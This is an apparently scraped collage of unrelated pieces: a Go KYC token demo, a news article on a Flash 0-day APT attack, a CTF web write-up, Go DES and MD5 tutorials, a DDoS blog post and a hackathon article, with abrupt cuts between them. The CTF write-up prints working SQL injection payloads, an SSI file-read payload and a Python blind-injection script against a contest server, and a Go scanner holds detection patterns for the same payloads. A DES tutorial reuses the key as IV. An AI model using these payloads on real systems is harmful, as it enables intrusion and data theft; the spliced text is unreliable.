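	requiredLevel int
	balances      map[string]uint64
}

func NewToken(issuer ed25519.PublicKey, requiredLevel int, holder string, supply uint64) *Token {
	return &Token{trustedIssuer: issuer, requiredLevel: requiredLevel,
		balances: map[string]uint64{holder: supply}}
}

// Eligible is the transfer restriction: the recipient must present a claim
// signed by the trusted issuer, bound to its own address, of at least the
// required level, and not yet expired. Any failure blocks the transfer.
func (t *Token) Eligible(to string, sc SignedClaim, now time.Time) error {
	if !ed25519.Verify(t.trustedIssuer, sc.Claim, sc.Signature) {
		return errors.New("claim not signed by a trusted identity provider")
	}
	var c KYCClaim
	if err := json.Unmarshal(sc.Claim, &c); err != nil {
		return err
	}
	switch {
	case c.Subject != to:
		return errors.New("claim is bound to a different address")
	case c.Level < t.requiredLevel:
		return errors.New("insufficient KYC level")
	case now.Unix() >= c.Expires:
		return errors.New("claim expired")
	}
	return nil
}

// Transfer moves tokens only after the recipient's eligibility check passes.
func (t *Token) Transfer(from, to string, amount uint64, sc SignedClaim, now time.Time) error {
	if err := t.Eligible(to, sc, now); err != nil {
		return err
	}
	if t.balances[from] < amount {
		return errors.New("insufficient balance")
	}
	t.balances[from] -= amount
	t.balances[to] += amount
	return nil
}

func (t *Token) BalanceOf(addr string) uint64 { return t.balances[addr] }

func main() {
	issuerPub, issuerPriv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		log.Fatal(err)
	}
	tok := NewToken(issuerPub, 2, "0xTreasury", 1000) // constructed addresses
	now := time.Now()
	exp := now.Add(24 * time.Hour).Unix()
	good, _ := IssueClaim(issuerPriv, KYCClaim{Subject: "0xBuyer", Level: 2, Expires: exp})
	fmt.Println("level-2 claim:", tok.Transfer("0xTreasury", "0xBuyer", 100, good, now))
	low, _ := IssueClaim(issuerPriv, KYCClaim{Subject: "0xBuyer", Level: 1, Expires: exp})
	fmt.Println("level-1 claim:", tok.Transfer("0xTreasury", "0xBuyer", 100, low, now))
	fmt.Println("buyer balance:", tok.BalanceOf("0xBuyer"))
}
```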

Automatic liquidity provisioning

This is an example of what a smart contract / application network could look like.



The example above provides the following functionality:

- Onboarding/tokenization of offline assets
- Registration of tokenized assets
- Price discovery
- Automatic loan applications
- Liquidity provisioning
- Loan insurance
- Credit/reputation scoring

As an example, let’s assume a loan marketplace to which an investor has provided liquidity, to be provisioned for loans that meet certain acceptance criteria. For example, the loan must be collateralized by tokenized assets, insured by a third party, and only granted to individuals with a certain credit score. At this point, an individual can use their registered Cryptokitties, which are dynamically priced, as collateral for said automated loan. This loan is then managed by the escrow contract, which holds custody of the collateral and the provisioned liquidity. The user would make regular interest payments on the loan to this contract, which are passed on to the investor.

Planning an ICO? At Fractal, we offer a hassle-fre

To take on the "Warrior Nation", someone pulled out a self-destructing 0-day


Once brothers from the same womb, now sworn enemies!

Russia and Ukraine were both republics of the Soviet Union, but since the 2014 Crimea crisis the formerly brotherly relationship has plunged to freezing point, and the two have at times been at daggers drawn.

And the two unlucky brothers still haven't calmed down: on November 25, three Ukrainian navy vessels crossed the Russian border heading for the Kerch Strait. During the standoff, Russian ships opened fire on the Ukrainian vessels and seized them, the sensational "Kerch Strait" incident.



Afterwards, just as everyone expected the two countries to negotiate under international pressure and defuse the conflict, Ukraine suddenly declared a state of full military readiness. With its arch-rival drawing its sword, Russia was hardly going to back down: it then deployed a fourth S-400 "Triumf" air defense missile battalion on the Crimean peninsula, bringing the two countries to the brink of war.

Some media have speculated that the incident was staged by Ukraine's current prime minister Poroshenko to win the upcoming presidential election: to make the biggest possible splash, he manufactured the "Kerch Strait incident" just days before the G20 summit, forcing US President Trump to cancel his planned meeting with Putin at the summit.



USA: Keep it up, you two troublemakers~

But that's not all! On December 4, Leiphone learned that on November 29 the 360 Advanced Threat Response Team had been the first in the world to discover an APT attack campaign targeting Russia. Notably, the samples came from Ukraine, and the target was the Presidential Administration of the Russian Federation.

More trouble? On hearing the news, the gossip-hungry Leiphone (WeChat account: 雷锋网) quickly reached out to a good friend, 360 Group assistant president Zheng Wenbin, for a full account of the APT attack.

A "self-destructing" Flash 0-day

360 dubbed this APT (advanced persistent threat) attack Operation "Poison Needle". It began with a Russian-language employee questionnaire document carrying the latest Flash 0-day, CVE-2018-15982, and a custom trojan with a self-destruct function. The attack ran in three main stages:

1> The attacker delivers a RAR archive; opening the decoy document inside it compromises the victim;


Attack flow of the exploit document

2> When the victim opens the employee questionnaire document, the Flash 0-day file is played;


Playing the Flash 0-day

3> After the vulnerability is triggered, the WinRAR extraction program manipulates the files inside the archive and executes the final PE payload, backup.exe;


Process tree of the exploit execution

But what makes this Flash 0-day special enough to be chosen for an attack on the highly sensitive Presidential Administration of the Russian Federation?

The CVE-2018-15982 0-day is a use-after-free (UAF) vulnerability in the Flash package com.adobe.tvsdk.mediacore.metadata. The exploit code uses it to achieve arbitrary code execution. Analysis of the final payload found that the PE is a backdoor heavily protected with VMProtect. After unpacking, the main program's principal function is to create a window message loop with eight main worker threads, including a timed self-destruct thread.

In other words, this thing comes with a "self-destruct" feature.

Zheng Wenbin told Leiphone that the trojan's timed self-destruct thread can, after completing its task, destroy the trojan, its logs and every trace left on the computer. In practice, the process by which 360 Security Brain uncovered the vulnerability was like a jigsaw puzzle: the goal was to gradually reconstruct the extremely fragmented samples by working backwards.

Because the attack destroys itself, 360 Security Brain's task of discovering the vulnerability was naturally much harder.

Not the first time? The APT attack has a lineage

On the afternoon of November 29, the QEX team and the advanced threat sandbox team of 360 Security Brain, using their advanced-threat probe technology and cloud sandbox, were the first to detect the Flash 0-day. The Zhuiri (追日) team then analysed the sample, traced its origin, reconstructed the full attack and ultimately determined it to be an APT attack targeting Russia.


Contents of the exploit document

According to Zheng Wenbin's analysis, the attacker exploits the UAF by forcing garbage collection to obtain a dangling pointer, triggers the UAF repeatedly to achieve arbitrary address read/write and bypass ASLR, and finally uses the method from the leaked HackingTeam code to bypass DEP/CFG and execute shellcode.

In other words, the attacker behind this APT is likely a "repeat offender", and the previous victim was the Italian arms dealer HackingTeam.

As one of the few companies selling surveillance tools to law enforcement agencies worldwide, Hacking Team helped governments intrude on and monitor journalists, activists, political opponents and others that governments considered threats.

In July 2015, the company was hacked and a large number of its cyber weapons and attack tools leaked; hackers used its Flash exploits in large-scale drive-by download campaigns reaching millions of victims, posing a serious threat to the security of the Internet as a whole.


Hacking Team hacked, large amounts of information leaked

Zheng Wenbin told Leiphone that such attacks have very few targets, usually state institutions, but the harm they cause is like a butterfly effect that can set off a huge storm.

For example, during Christmas 2015 Ukraine's national power sector suffered an APT attack; 1.4 million residents of western Ukraine experienced a large-scale blackout in the depth of winter, and cities fell into panic.

Clearly, if cross-border APT attacks are not discovered and stopped in time, the consequences are unthinkable.

So what was the attacker's goal behind this APT attack?

According to its official website, the targeted organization belongs to the Presidential Administration of the Russian Federation and is a specialized medical institution serving staff of the highest executive, legislative and judicial authorities of the Russian Federation, as well as scientists and artists.

Although the attacker's motive and identity cannot yet be determined, the special background of this medical institution and the sensitive population it serves give the attack a degree of targeting.


Description of the hospital

Fortunately, after the attack was discovered, 360 immediately reported the details of the 0-day to Adobe. On December 5, Adobe rushed out Flash version 32.0.0.101 to fix the 0-day and credited the 360 team.

Netizens: after all that help, shouldn't Adobe give a reward?

After discovering the vulnerability, 360 chose to publish the detailed detection process on Weibo first. As of today, a large number of netizens have left comments, some of them quite imaginative.

During the interview, Leiphone picked two of those questions to put to Zheng Wenbin:

Weibo user @钢冰水火: "After all that help, won't Adobe consider giving some reward?"

Zheng Wenbin: I think there are two sides to this. First, 360 itself discovers many vulnerabilities and reports them to vendors, and some vendors have corresponding reward programs. Second, if a vulnerability has already been exploited by attackers, it is a 0-day under active attack, the risk level is higher, and once found the vendor takes it more seriously;

Weibo user @不返之六号归复者: "A two-front attack by the US? I'd guess an 85% chance the Americans are behind it."

Zheng Wenbin: Personal speculation without supporting data is not credible. 360 analyses the evidence entirely from the available samples to determine where this APT attack points; at present the specific identity of the attacker and their precise intent cannot be determined.



In fact, once a vulnerability is discovered and exposed, it not only warns the vendor but also forces the attack campaign to be shelved or abandoned, which actively helps stop the APT attack from continuing.

"Backed by AI technology, 360 Security Brain can already track advanced threat attacks among tens of billions of samples, forging an unbreakable 'firewall' for complex network systems."

Do you think this APT attack is necessarily linked to the "Kerch Strait" incident? What is your own take on this APT campaign? Share your thoughts in the comments below!

雷锋网原创文章,未经授权禁止转载。详情见 转载须知 。

EIS-2018-web


Try a quick login first



An error was returned, so I tried

admin' and (extractvalue(1,concat(0x7e,database())))#



admin' and (extractvalue(1,concat(0x7e,(select group_concat(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA=database()))))#



admin' and (extractvalue(1,concat(0x7e,(select group_concat(COLUMN_NAME) from information_schema.COLUMNS where TABLE_NAME='flag'))))#



admin' and (extractvalue(1,concat(0x7e,(select flag from flag limit 0,1))))#


First half:

'~EIS{7879f0a27d8bcfcff0bcc837d76'

admin' and (extractvalue(1,concat(0x7e,(select substr(flag,30,60) from flag limit 0,1))))#


Second half:

~7641e81}

Final flag:

EIS{7879f0a27d8bcfcff0bcc837d7641e81}

SimpleServerInjection

Hint:

SimpleServerInjection, SSI, flag in current directory

So I searched for SSI

https://blog.csdn.net/wutianxu123/article/details/82724637

It turned out the first thing in that article was the payload...

<!--#include virtual="/etc/passwd" -->

So I tested

http://210.32.4.22/index.php?name=<!--#include virtual="flag" -->


Got the flag:

EIS{59f2c02f18838b3fb57dd57e2808f9c2}

SimpleExtensionExplorerInjection

The hint says XXE, but a plain XXE payload doesn't work


So the type needs to be changed


After that XXE can read the file, which gives the flag

SimplePrintEventLogger

Directory listing works directly


Which gives the flag


Not sure whether this was an unintended solution: the hint says RCE, and there is a backdoor route that I never used


SimpleBlog

The hint points to second-order injection


So I tried registering the usernames

sky' sky'#

The former always scores 0, while the latter gets a score.

So we can infer that the username is used in the query that updates the score.

But an ordinary boolean blind injection can't be built here, because the SQL statement has to error out.

This brings to mind the integer overflow trick:

1' and if(1,exp(999999999999),1)#

This makes the SQL statement error out, resulting in

grade 0

Whereas with

1' and if(0,exp(999999999999),1)#

the score is normal, so this difference can be used for injection.

Script:

import requests


def reg(username, password='1'):
    # register a user whose name carries the injection payload
    data = {'username': username, 'password': password}
    url = 'http://210.32.4.20/register.php'
    r = requests.post(url=url, data=data)
    # cut the PHPSESSID value out of the Set-Cookie header
    return r.headers['Set-Cookie'][10:-8]


def login(session, username, password='1'):
    # log in, submit an answer, and read the score back
    data = {'username': username, 'password': password}
    cookie = {'PHPSESSID': session}
    url = 'http://210.32.4.20/login.php'
    r = requests.post(url=url, data=data, cookies=cookie)
    data = {'10.a': 'on'}
    url = 'http://210.32.4.20/answer.php'
    r = requests.post(url=url, data=data, cookies=cookie)
    # a score of 0 means the injected condition was true (exp() overflowed)
    if 'Your grades is 0' in r.text:
        return 1
    url = 'http://210.32.4.20/logout.php'
    r = requests.get(url=url, cookies=cookie)
    return 0


flag = 'EIS{'
for i in range(5, 1000):
    for k in 'abcdef0123456789}':
        j = ord(k)
        payload = '''1' and if((ascii(substr((select flag from flag limit 0,1),%d,1))=%d),exp(999999999999),1)#''' % (i, j)
        try:
            session = reg(payload)
            if login(session, payload):
                flag += chr(j)
                print(flag)
                break
        except Exception:
            # retry once on a network error
            session = reg(payload)
            if login(session, payload):
                flag += chr(j)
                print(flag)
                break

Not sure what the hint about file inclusion means; maybe this was unintended as well?
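From the defender's side, the payloads used across these challenges (extractvalue error-based injection, schema enumeration through information_schema, the exp() overflow oracle, SSI #include, and XXE external entities) are easy to spot in web server logs once the query string is decoded. The following is an added example, not part of the writeup, that URL-decodes constructed access-log lines and tags each one with the rule it trips; the log lines, hostnames and rule names are this example's own.

```go
package main

import (
	"fmt"
	"net/url"
	"regexp"
	"strings"
)

// Rule pairs a label with a pattern matched against the decoded,
// lower-cased request line. The patterns mirror the payloads in this writeup.
type Rule struct {
	Name    string
	Pattern *regexp.Regexp
}

var rules = []Rule{
	{"mysql-error-based-xml", regexp.MustCompile(`\b(extractvalue|updatexml)\s*\(`)},
	{"mysql-schema-enumeration", regexp.MustCompile(`information_schema\.(tables|columns)`)},
	{"mysql-overflow-error", regexp.MustCompile(`\bexp\s*\(\s*9{9,}`)},
	{"ssi-include", regexp.MustCompile(`<!--\s*#\s*(include|exec)\b`)},
	{"xxe-external-entity", regexp.MustCompile(`<!entity\b[^>]*\bsystem\b`)},
}

// normalize URL-decodes the line twice (to catch double encoding) and
// lower-cases it so that percent-encoding and case tricks do not evade the rules.
func normalize(line string) string {
	s := line
	for i := 0; i < 2; i++ {
		if d, err := url.QueryUnescape(s); err == nil {
			s = d
		}
	}
	return strings.ToLower(s)
}

// Scan returns, keyed by line index, the names of the rules each line triggers.
func Scan(lines []string) map[int][]string {
	hits := make(map[int][]string)
	for i, line := range lines {
		n := normalize(line)
		for _, r := range rules {
			if r.Pattern.MatchString(n) {
				hits[i] = append(hits[i], r.Name)
			}
		}
	}
	return hits
}

// Constructed sample lines (not real traffic); the IPs and paths are placeholders.
var sampleLog = []string{
	`10.0.0.5 - - [07/Dec/2018:10:00:01 +0800] "GET /index.php?name=home HTTP/1.1" 200 512`,
	`10.0.0.9 - - [07/Dec/2018:10:00:02 +0800] "POST /login.php?user=admin%27%20and%20(extractvalue(1,concat(0x7e,database())))%23 HTTP/1.1" 500 0`,
	`10.0.0.9 - - [07/Dec/2018:10:00:03 +0800] "GET /index.php?name=%3C!--%23include%20virtual%3D%22flag%22%20--%3E HTTP/1.1" 200 40`,
	`10.0.0.9 - - [07/Dec/2018:10:00:04 +0800] "POST /register.php?username=1%27%20and%20if(1,exp(999999999999),1)%23 HTTP/1.1" 302 0`,
	`10.0.0.9 - - [07/Dec/2018:10:00:05 +0800] "POST /xml.php HTTP/1.1" 200 88 "%3C!ENTITY%20x%20SYSTEM%20%22file:///etc/passwd%22%3E"`,
}

func main() {
	for i, names := range Scan(sampleLog) {
		fmt.Printf("line %d: %s\n", i, strings.Join(names, ","))
	}
}
```

The decode-then-match order matters: matching the raw line would miss every encoded payload above, and the second decode pass covers clients that double-encode to slip past a naive filter.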


The crypto/des package in Go


DES is a symmetric encryption algorithm; for more on the DES algorithm and its implementation, search Baidu.

Note: this content is reproduced from http://blog.studygolang.com/2013/01/go%E5%8A%A0%E5%AF%86%E8%A7%A3%E5%AF%86%E4%B9%8Bdes/

Go DES encryption and decryption

1. The crypto/des package

Go's crypto/des package implements the Data Encryption Standard (DES) and the Triple Data Encryption Algorithm (TDEA, Triple DES). See the package documentation.

It defines the DES block size (8 bytes) and a KeySizeError. It also defines the two functions we need to pay particular attention to, namely

func NewCipher(key []byte) (cipher.Block, error)
func NewTripleDESCipher(key []byte) (cipher.Block, error)

Both functions return a cipher.Block. As the names make clear, DES uses NewCipher and 3DES uses NewTripleDESCipher. The parameter of each is the key.

DES encryption and decryption (CBC mode)

1) Encryption

Code:

// DES-CBC encryption; needs imports "crypto/cipher" and "crypto/des"
func DesEncrypt(origData, key []byte) ([]byte, error) {
	block, err := des.NewCipher(key)
	if err != nil {
		return nil, err
	}
	origData = PKCS5Padding(origData, block.BlockSize())
	// the 8-byte key doubles as the IV here (same length as the DES block)
	blockMode := cipher.NewCBCEncrypter(block, key)
	crypted := make([]byte, len(origData))
	blockMode.CryptBlocks(crypted, origData)
	return crypted, nil
}

The code above uses DES (des.NewCipher) in CBC mode (cipher.NewCBCEncrypter(block, key)) with PKCS5Padding for padding; that function's code is:

// PKCS5Padding pads to a multiple of blockSize; needs import "bytes"
func PKCS5Padding(cipherText []byte, blockSize int) []byte {
	padding := blockSize - len(cipherText)%blockSize
	padText := bytes.Repeat([]byte{byte(padding)}, padding)
	return append(cipherText, padText...)
}

Note that even when the data length is an exact multiple of blockSize, a full block of padding is still added.

2) Decryption

// DES-CBC decryption: same key and key-as-IV as DesEncrypt
func DesDecrypt(crypted, key []byte) ([]byte, error) {
	block, err := des.NewCipher(key)
	if err != nil {
		return nil, err
	}
	blockMode := cipher.NewCBCDecrypter(block, key)
	origData := make([]byte, len(crypted))
	// origData := crypted
	blockMode.CryptBlocks(origData, crypted)
	origData = PKCS5UnPadding(origData)
	// origData = ZeroUnPadding(origData)
	return origData, nil
}

As you can see, decryption just calls cipher.NewCBCDecrypter and removes the padding at the end; otherwise it is almost identical to encryption. The corresponding PKCS5UnPadding:

// PKCS5UnPadding trusts the last byte as the pad length; it does not
// validate it, so malformed input can make the slice expression panic
func PKCS5UnPadding(origData []byte) []byte {
	length := len(origData)
	// strip as many bytes as the value of the last byte says
	unpadding := int(origData[length-1])
	return origData[:(length - unpadding)]
}

3DES encryption and decryption

1) Encryption code

// 3DES encryption
func TripleDesEncrypt(origData, key []byte) ([]byte, error) {
	block, err := des.NewTripleDESCipher(key)
	if err != nil {
		return nil, err
	}
	origData = PKCS5Padding(origData, block.BlockSize())
	// origData = ZeroPadding(origData, block.BlockSize())
	// the 24-byte key is too long for an IV, so its first 8 bytes are used
	blockMode := cipher.NewCBCEncrypter(block, key[:8])
	crypted := make([]byte, len(origData))
	blockMode.CryptBlocks(crypted, origData)
	return crypted, nil
}

Compared with DES, only NewTripleDESCipher differs. Note, however, that the key length must be 24 bytes, otherwise an error is returned immediately. PHP is not like this: any key of 8 bytes or more works; Java requires at least 24 bytes and internally takes the first 24 (so effectively 24 bytes).

Also, the initialization vector is 8 bytes long (every language currently works this way; an IV that is not 8 bytes causes problems). However, if you are using Go 1.0.3 (or below), the iv may be other than 8 bytes. In fact, cipher.NewCBCEncrypter carries the comment:

The length of iv must be the same as the Block's block size.

but the code did not check it. Go tip has fixed this: if iv is not equal to the block size (8 for DES), it panics directly. So for encryption and decryption, always test and make sure iv equals the block size, or it may panic:

func NewCBCDecrypter(b Block, iv []byte) BlockMode {
	if len(iv) != b.BlockSize() {
		panic("cipher.NewCBCDecrypter: IV length must equal block size")
	}
	return (*cbcDecrypter)(newCBC(b, iv))
}

My guess as to why a panic is used here rather than returning an error is that in the released version the method does not return an error, and changing the method signature would break compatibility, hence the panic.

Decryption code:

// 3DES decryption
func TripleDesDecrypt(crypted, key []byte) ([]byte, error) {
	block, err := des.NewTripleDESCipher(key)
	if err != nil {
		return nil, err
	}
	blockMode := cipher.NewCBCDecrypter(block, key[:8])
	origData := make([]byte, len(crypted))
	// origData := crypted
	blockMode.CryptBlocks(origData, crypted)
	origData = PKCS5UnPadding(origData)
	// origData = ZeroUnPadding(origData)
	return origData, nil
}
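Two things a practitioner would change in the functions above: the IV is derived from the key (so identical plaintexts under one key give identical ciphertexts), and PKCS5UnPadding trusts the last byte, so a corrupted or hostile ciphertext makes it panic. The following is an added example, not from the page or the reproduced blog, that uses the same crypto/des and crypto/cipher calls with a random per-message IV prepended to the ciphertext and a validated unpad; the names encryptCBC, decryptCBC, newBlock and pkcs5Unpad are this example's own. DES and 3DES appear only because they are the package under discussion; new designs should reach for AES-GCM.

```go
package main

import (
	"bytes"
	"crypto/cipher"
	"crypto/des"
	"crypto/rand"
	"errors"
	"fmt"
	"io"
)

// pkcs5Pad appends 1..blockSize bytes, each equal to the pad length
// (the same scheme as the page's PKCS5Padding).
func pkcs5Pad(data []byte, blockSize int) []byte {
	padding := blockSize - len(data)%blockSize
	return append(data, bytes.Repeat([]byte{byte(padding)}, padding)...)
}

// pkcs5Unpad validates the padding before stripping it instead of trusting
// the last byte, so bad input yields an error rather than a panic.
func pkcs5Unpad(data []byte, blockSize int) ([]byte, error) {
	n := len(data)
	if n == 0 || n%blockSize != 0 {
		return nil, errors.New("invalid padded length")
	}
	padding := int(data[n-1])
	if padding == 0 || padding > blockSize {
		return nil, errors.New("invalid padding byte")
	}
	for _, b := range data[n-padding:] {
		if int(b) != padding {
			return nil, errors.New("inconsistent padding")
		}
	}
	return data[:n-padding], nil
}

// newBlock picks 3DES for a 24-byte key and DES otherwise; crypto/des itself
// rejects any other length with a KeySizeError.
func newBlock(key []byte) (cipher.Block, error) {
	if len(key) == 24 {
		return des.NewTripleDESCipher(key)
	}
	return des.NewCipher(key)
}

// encryptCBC returns iv || ciphertext with a fresh random IV per message.
func encryptCBC(plaintext, key []byte) ([]byte, error) {
	block, err := newBlock(key)
	if err != nil {
		return nil, err
	}
	bs := block.BlockSize()
	out := make([]byte, bs+len(plaintext)+bs-len(plaintext)%bs)
	iv := out[:bs]
	if _, err := io.ReadFull(rand.Reader, iv); err != nil {
		return nil, err
	}
	padded := pkcs5Pad(append([]byte(nil), plaintext...), bs)
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(out[bs:], padded)
	return out, nil
}

// decryptCBC splits off the IV, decrypts, and verifies the padding.
func decryptCBC(data, key []byte) ([]byte, error) {
	block, err := newBlock(key)
	if err != nil {
		return nil, err
	}
	bs := block.BlockSize()
	if len(data) < 2*bs || len(data)%bs != 0 {
		return nil, errors.New("ciphertext too short or not block-aligned")
	}
	iv, ct := data[:bs], data[bs:]
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(pt, ct)
	return pkcs5Unpad(pt, bs)
}

func main() {
	key := []byte("0123456789abcdef01234567") // constructed 24-byte 3DES key
	ct, err := encryptCBC([]byte("hello, CBC"), key)
	if err != nil {
		panic(err)
	}
	pt, err := decryptCBC(ct, key)
	fmt.Printf("%q %v\n", pt, err)
}
```

Without authentication, CBC ciphertext can still be tampered with undetected; the padding check only turns such tampering into an error instead of a crash, which is why a MAC or an AEAD mode is the real fix.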

The crypto/md5 package in Go


The md5 package implements the MD5 hash algorithm.

First the contents of the package, then how to produce an MD5 value. Using md5 in Go is quite a bit more involved than in PHP, where md5(value) gives you the hash directly; PHP is better suited to production than to learning.

Constants

const BlockSize = 64 // MD5 block size in bytes
const Size = 16      // size of an MD5 checksum in bytes

func Sum(data []byte) [Size]byte

Returns the MD5 checksum of data.

func New() hash.Hash

Returns a new hash.Hash computing the MD5 checksum.

h := md5.New()                  // needs imports "crypto/md5" and "fmt"
h.Write([]byte("123456"))
fmt.Println(h.BlockSize())      // prints 64
fmt.Printf("%x\n", h.Sum(nil))  // the MD5 digest of "123456" as hex
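The two APIs listed above serve different shapes of input: md5.Sum for data already in memory, and md5.New plus Write (or io.Copy) for streams that should not be buffered whole. The following added example, not from the page, shows both, plus a constant-time comparison against an expected digest, which is how a checksum should be verified rather than with string equality; the function names are this example's own.

```go
package main

import (
	"crypto/md5"
	"crypto/subtle"
	"encoding/hex"
	"fmt"
	"io"
	"strings"
)

// md5Hex hashes a whole byte slice with the one-shot md5.Sum.
func md5Hex(data []byte) string {
	sum := md5.Sum(data)
	return hex.EncodeToString(sum[:])
}

// md5HexStream hashes an io.Reader incrementally via md5.New; this is the
// form to use for files or sockets that do not fit in memory.
func md5HexStream(r io.Reader) (string, error) {
	h := md5.New()
	if _, err := io.Copy(h, r); err != nil {
		return "", err
	}
	return hex.EncodeToString(h.Sum(nil)), nil
}

// verifyMD5 compares the digest of data with expectedHex in constant time,
// so a mismatch does not leak how many leading bytes matched.
func verifyMD5(data []byte, expectedHex string) bool {
	expected, err := hex.DecodeString(expectedHex)
	if err != nil || len(expected) != md5.Size {
		return false
	}
	sum := md5.Sum(data)
	return subtle.ConstantTimeCompare(sum[:], expected) == 1
}

func main() {
	fmt.Println(md5Hex([]byte("123456")))
	if s, err := md5HexStream(strings.NewReader("123456")); err == nil {
		fmt.Println(s)
	}
	fmt.Println(verifyMD5([]byte("123456"), "e10adc3949ba59abbe56e057f20f883e"))
}
```

MD5 is fine as a non-adversarial checksum or cache key, but it is not collision-resistant, so the same three functions should be built on crypto/sha256 wherever an attacker could choose the input.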

Prompt remediation after being DDoSed, and some reflections


My CDN is hosted on Tencent Cloud. On October 2 I received an SMS alert: CDN traffic quota exhausted. After logging into the console I found that 360 GB had been fraudulently consumed and the peak bandwidth had reached an unimaginable 680 Mbps. For a personal website that is an almost impossible amount of traffic.



Skeptical, I checked the regional distribution. Sure enough, overseas requests accounted for 98.24% of all requests, and over 300 GB of the traffic came from abroad, so it was clear that foreign traffic had drained my CDN quota.



With no alternative I opened a support ticket, but because some of my own defenses were not in place, no compensation came of it. I had no choice but to pay for the stolen traffic myself to keep the service running, and during the ticket exchange I added security measures such as a QPS limit.

Limiting QPS will undoubtedly affect normal users and add latency. But to be safe I set one anyway, hoping not to be attacked again.

1.2 Hit again

It did not last: after only one quiet day, another wave of DDoS from overseas forced me to temporarily shut down the CDN and COS services. In the figure below, the first peak is the previous DDoS and the second is this one.



This attack was more sophisticated, with a real "the devil is always one step ahead" flavor. I had added the QPS limit and similar measures earlier, but they do nothing against techniques such as IP proxy pools, and this time the attacker also chose a large single file to hammer.



As usual I went back to support, because last time a Tencent Cloud engineer had specifically called me: as long as the relevant security limits were in place, the next confirmed case of traffic theft would be compensated immediately. Yet this time the ticket was evasive again, throwing all sorts of documents and rules at me, saying nothing about compensation, and even telling me my QPS setting was too high :).

The question is: if QPS is set to 5, can the project still be used? If users are on the same LAN (campus network, Wi-Fi and the like), can only one of them use it normally in any given second?

In the end an engineer called again, and after an hour on the phone compensation was possible, but the 90 GB traffic package would take a while to be approved. Since my quota was already exceeded, I still had to top it up myself to keep things running the next day. Well, it counts as a solution.

1.3 No way out

After two DDoS attacks I turned on the "bandwidth cap" setting. Based on daily usage I estimated "3 Mbps", and on exceeding it the CDN returns 404 and shuts the service down.



That same evening I received the SMS that the CDN had hit the bandwidth cap and had been shut down automatically: the project could no longer be used.

This time I was thoroughly discouraged; all I could do was shut down the CDN service and look for another solution.

2. A bumpy road to remediation

When working on remediation I first ruled out the support ticket's suggestions: fall back to the origin server or to COS (object storage). The former would simply bring the server down, with the DDoS landing squarely on it; the latter, COS, is also billed by traffic or bandwidth and is essentially no different from the CDN.

So I disabled the current CDN acceleration domain and emptied the files in COS. Then I handled the personal website and the project application differently.

2.1 Company project: change the CDN domain

Looking at the stolen resources, all of them were static resources of the personal website. The company project is only used by partner merchants, and crawlers are disallowed in robots.txt, so I used another account to open a new COS bucket and enable a corresponding CDN acceleration domain.

As for why the personal website and the company project were put together in the first place, it was just for convenience of uploading and management; in hindsight, saving one step caused endless trouble.

2.2 Personal website: Git hosting

Free Git hosting can store images, code and other data and make them accessible from outside. Since most users are in China, I put the images for the friend-links page and the articles into a public repository on Coding.net.

For example, the address of an image like the one below is: https://qcloud.coding.net/u/godbmw/p/blog/git/raw/master/markdown-static/网站搭建与运营/第一次遭遇云服务器完全崩溃/1.png



However, when I put code on Coding or GitHub, although the content can be requested, the Content-Type field in the Response Header is text/plain; ..., and browsers will not parse a CSS stylesheet served that way. So packaged project files such as js and css cannot be hosted on a Git platform.

2.3 Free CDN: CloudFlare

This is the world's largest free CDN, and it is reachable from within China. Ping stays at around 100 ms; see the relevant test articles for details. Beyond that, CloudFlare can absorb DDoS, CC and other attacks; it is said that when Baidu could not withstand an overseas DDoS, it too pointed its DNS at CloudFlare to handle it.

Operating CloudFlare is simple: on first registration, follow its guidance to change the DNS settings at your domain registrar. With a foreign registrar it syncs within minutes; I did not try a domestic one. On success, the console page shows "Active".


Thanks to the V2EX users who pointed out: in the DNS panel of the CloudFlare console, turn on the little cloud icon (enable HTTP Proxy), otherwise their CDN is not used and your IP remains exposed.

In addition, there are the following measures:

1. Raise the security level in the console: the default is Essentially Off, and it can be raised as appropriate
2. Set firewall rules: domestic IPs access directly, foreign IPs must pass a JavaScript challenge
3. Limit the request rate

At this point the personal website was accessible normally again.

3. Some reflections

I had been using Tencent Cloud all along before this, and I hope cloud platforms will adopt prepaid (currently it is postpaid) bandwidth limits.

Tencent Cloud's official documentation does mention a waiver for traffic surges caused by attacks such as DDoS, as shown below:



Did you notice: the bandwidth must reach 10 Gbps or more before the waiver applies. What I experienced this time was only 680 Mbps; if it had reached 10 Gbps the consequences are unthinkable, I would probably have lost my shirt. When I discussed it with support, they simply gave me this image; what if a user's stolen traffic reaches 9 Gbps? Does that also fail to meet the requirement, so the user still has to pay? The loss would be hard to measure. I hope platforms improve the relevant rules in future.

When I first built the site I cared about big names (naively assuming the bigger the company the more reliable); now I realize that a cloud platform's security and stability, remediation measures and pricing are what matter.

Finally, for personal projects I strongly recommend the foreign "cloudflare": free, unlimited traffic, attack-resistant, just like JetBrains abroad (free educational edition), companies with heart. Respect!!!

Speaking for open source: NouGit, champion team of the EOS hackathon, hopes to encourage people to build the blockchain together



Introduction

For the past 30 years open-source developers have been the backbone of the tech industry; NouGit will bring wealth to these open-source projects themselves, rather than letting it all flow to Microsoft or IBM.

A team that regularly attended EOS meetups won gold in the San Francisco competition with an application that aligns the interests of the project economy and the developers who contribute.

In software development, open source is an attractive concept. Open source means allowing any IT developer to build on and improve the code, to the benefit of everyone.

This idea is the cornerstone of several major operating protocols of our time, from Linux to EOSIO.

But what if IT developers were rewarded for proposing solutions that improve a protocol?

That is the enticing idea behind NouGit, the winning project at the EOS Global Hackathon held in San Francisco earlier this month.

The theme of the competition was to create an EOSIO application that "aligns the interests of all parties and/or brings users more wealth". NouGit beat 74 other teams in fierce competition to win the championship prize of up to $100,000. Their project is a decentralized, incentivized Git repository, i.e. a system for tracking and coordinating changes to files and source code in software.

"For the past 30 years open-source developers have been the backbone of the tech industry, and NouGit will bring wealth to these open-source projects themselves rather than letting it all flow to Microsoft or IBM," says Rob Behnke, a serial entrepreneur and one of the five members of the NouGit team, who will travel to Cape Town, South Africa next month for the hackathon finals.

For instance, in recent months Microsoft and IBM each closed multi-billion-dollar acquisitions of the world's two largest open-source development platforms: Microsoft acquired GitHub for $7.5 billion, and IBM bought Red Hat for $34 billion.

Behnke, however, believes these "centralized" models do not maximize collaboration. "Decentralization is what lets a platform grow and advance the concept of open source," he says, adding that NouGit's bounty program aligns the interests of project managers and participating developers.

